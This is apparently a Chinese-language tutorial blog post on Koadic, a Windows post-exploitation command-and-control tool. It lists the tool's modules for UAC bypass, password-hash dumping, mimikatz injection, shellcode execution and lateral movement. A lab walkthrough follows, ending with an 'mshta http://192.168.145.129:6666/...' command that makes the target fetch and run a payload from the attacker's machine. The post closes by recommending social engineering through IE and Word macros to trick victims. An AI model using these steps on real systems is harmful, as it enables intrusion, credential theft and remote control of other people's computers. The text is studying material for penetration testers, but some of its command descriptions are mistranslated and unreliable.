Koadic项目主页
介绍
Koadic或COM命令与控制,是一个Windows后挖掘rootkit类似于其他渗透测试工具,如Meterpreter和Powershell帝国。主要区别在于,Koadic使用Windows Script Host(又名JScript / VBScript)来执行其大部分操作,在核心中具有兼容性,可以支持Windows 2000的默认安装,并且无需任何Service Pack(甚至可能包括NT4的版本)通过Windows 10。
有可能从0级到另外级的内存完全在内存中提供有效载荷,还可以使用SSL和TLS(取决于受害者操作系统启用的内容)的加密安全通信。
Koadic也试图兼容Python 2和Python 3。
用法
COMMAND DESCRIPTION 命令 描述
——— ————-
load reloads all modules //显示
info shows the current module options//显示当前模块选项。
use switch to a different module//切换到不同的模块
set sets a variable for the current module//为当前模块设置一个变量
jobs shows info about jobs//显示有关工作的信息
help displays help info for a command//获取一个cmdshell
cmdshell command shell to interact with a zombie// 命令 shell 与僵尸交互
kill shows info about jobs//显示有关工作的信息
listeners shows info about stagers//显示信息的传输器载荷
exit exits the program//退出
zombies lists hooked targets//显示所有僵尸会话
run runs the current module//运行,和exploit一个样
verbose exits the program//退出程序
Stagers
Stagers是在你攻击机上生成的payload的种类
| Module | Description |
|---|---|
| stager/js/mshta | serves payloads in memory using MSHTA.exe HTML Applications |
| stager/js/regsvr | serves payloads in memory using regsvr32.exe COM+ scriptlets |
| stager/js/rundll32_js | serves payloads in memory using rundll32.exe |
| stager/js/disk | serves payloads using files on disk |
-Implants
| Module | Description |
|---|---|
| — | — |
| implant/elevate/bypassuac_sdclt | Uses enigma0x3’s sdclt.exe exploit to bypass UAC on Windows 10. |
| implant/fun/zombie | Maxes volume and opens The Cranberries YouTube in a hidden window. |
| implant/fun/voice | Plays a message over text-to-speech. |
| implant/gather/clipboard | Retrieves the current content of the user clipboard. |
| implant/gather/hashdump_sam | Retrieves hashed passwords from the SAM hive. |
| implant/gather/hashdump_dc | Domain controller hashes from the NTDS.dit file. |
| implant/inject/mimikatz_dynwrapx | Injects a reflective-loaded DLL to run powerkatz.dll (using Dynamic Wrapper X). |
| implant/inject/mimikatz_dotnet2js | Injects a reflective-loaded DLL to run powerkatz.dll (@tirannido DotNetToJS). |
| implant/inject/shellcode_excel | Runs arbitrary shellcode payload (if Excel is installed). |
| implant/manage/enable_rdesktop | Enables remote desktop on the target. |
| implant/manage/exec_cmd | Run an arbitrary command on the target, and optionally receive the output. |
| implant/pivot/stage_wmi | Hook a zombie on another machine using WMI. |
| implant/pivot/exec_psexec | Run a command on another machine using psexec from sysinternals. |
| implant/scan/tcp | Uses HTTP to scan open TCP ports on the target zombie LAN. |
| implant/utils/download_file | Downloads a file from the target zombie. |
| implant/utils/upload_file | Uploads a file from the listening server to the target zombies. |
安装与实例
攻击机(192.168.145.129)
靶机Win7旗舰版(192.168.145.130)
git clone https://github.com/zerosum0x0/koadic.git
cd koadic
pip install -r requirements.txt
./koadic
set LHOST 192.168.145.129
set LPORT 6666
info
执行到这 可能会出现这个问题UnicodeDecodeError: ‘ascii’ codec can’t decode byte 0xe5 in position 108: ordinal not in ran
run
[+] Spawned a stager at http://192.168.145.129:6666/DDEUV
[!] Avoid manually editing this URL!!!
[>] mshta http://192.168.145.129:6666/DDEUV
在靶机执行
mshta http://192.168.145.129:6666/DDEUV
执行完以后可以看到靶机已经上线了
但是现在没有权限 并不能继续搞事情 所以接着就要bypass了
这里我选eventvwr 其实这两个都可以 不过要注意有时候第一个会打开事件查看器
同样的 设置好参数就可以了
接下来 我们试着把一张图片上传到靶机中
心得
这个远控不仅可以通过TLS/SSL加密,在后台静默运行也会使攻击更加透明。模块从bypass,哈希和密码的收集以及注入和上传下载文件
对于使用的场景 通过社工更能发挥这个工具的威力 通过IE和word宏比起cmd命令也更容易让人“中招”。